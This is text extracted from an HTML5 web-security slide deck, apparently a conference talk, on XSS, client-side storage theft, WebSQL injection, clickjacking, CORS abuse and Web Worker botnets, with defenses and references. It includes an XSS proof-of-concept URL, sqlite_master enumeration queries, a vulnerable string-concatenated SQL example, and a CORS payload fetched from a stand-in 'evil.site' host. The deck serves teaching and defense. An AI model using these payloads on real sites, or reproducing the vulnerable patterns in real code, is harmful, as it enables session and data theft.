youstar@insight-labs 

 Introduction to HTML5  HTML5 threat model  Vulnerabilities & Defense  Tools  Reference 

 History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation 

 Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc 

 Features 

No content

No content

 XSS abuse with tags and attributes  Hiding URL Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets 

 In:  New tags: ,,,,,  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a ,  Presentation attributes including align, border  ,   Old special effects: ,  

 Attack:  New XSS Vector  Bypass Black-list Filter  Defense:  Add new tags to Black-list  Change Regex 

No content

 DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry. 

http://127.0.0.1/html5/poc/history/xsspoc.php?xss=< script>history.pushState({},'',location.href.split("?"). shift());document.write(1) http://127.0.0.1/html5/poc/history/xsspoc.php 

No content

 Type  LocalStorage：for long-term storage  SessionStorage：for the session application(last when the browser closed)  Differences  Cookies：4k  LocalStorage/ SessionStorage：depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50 

No content

 Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()  (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear() 

 Attack  Get the data from the storage(cookie,passwd,etc)  Storage your xss shellcode  Unlimit the path  Defense  Don’t store sensitive data in local storage  Don't use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags 

No content

 Database Storage  The same as the Google Gears  Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql();  Type  SQLite (support by WebKit) 

 Attack  Store shellcode  SQL inject  Defense  Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data 

 Store shellcode 

 SQL Injection  Use sqlite_master ▪ SELECT name FROM sqlite_master WHERE type='table' ▪ SELECT sql FROM sqlite_master WHERE name='table_name' ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True 

 Drag and drop basics  Drag Data  the drag feedback image  drag effects  Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend 

No content

 ClickJacking  XSS + Drag 

No content

 CookieJacking  Use many technology to steal user’s local cookies  Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB 

No content

 Defense  Use iframe with sandbox  If (top !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href 

 postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... } 

No content

 Defense  Check the postMessage origin  Don’t use innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage 

 Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc 

No content

No content

 Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ （Flash crossdomain.xml ）  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request} 

 Code like this: x = new XMLHttpRequest(); x.open("GET",location.hash.substring(1)); x.onreadystatechange=function(){if(x.readyState==4){ document.getElementById("main").innerHTML=x.responseText;}} x.send();  POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within  New type of XSS!! 

No content

 Web Workers  running scripts in the background independently  Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects 

 Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address 

 COR+XSS+Workers=shell of the future 

 HTML5CSdump  enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name  JS-Recon  Port Scans  Network Scans  Detecting private IP address 

 Imposter  Steal cookies  Set cookies  Steal Local Shared Objects  Steal stored passwords from FireFox  etc  Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures 

 Ravan  JavaScript based Distributed Computing system  hashing algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512 

 HTML5 带来的新安全威胁:xisigr  Attacking with HTML5:lavakumark  Abusing HTML5:Ming Chow  HTML5 Web Security:Thomas Röthlisberger  Abusing HTML 5 Structured Client-side Storage:Alberto Trivero  Cookiejacking：Rosario Valotta  http://heideri.ch/jso/#html5  http://www.wooyun.org/bugs/wooyun-2011-02351  http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html  http://www.html5test.com 

 http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html  http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox  http://code.google.com/intl/zh-CN/apis/gears/api_database.html  http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html  http://www.w3.org/TR/access-control/  http://m-austin.com/blog/?p=19  https://developer.mozilla.org/en/  http://www.w3.org/TR/cors/  http://www.andlabs.org/tools/ravan.html  http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/ 

 Contact Me  email:[email protected]  Site:  www.codesec.info  www.insight-labs.org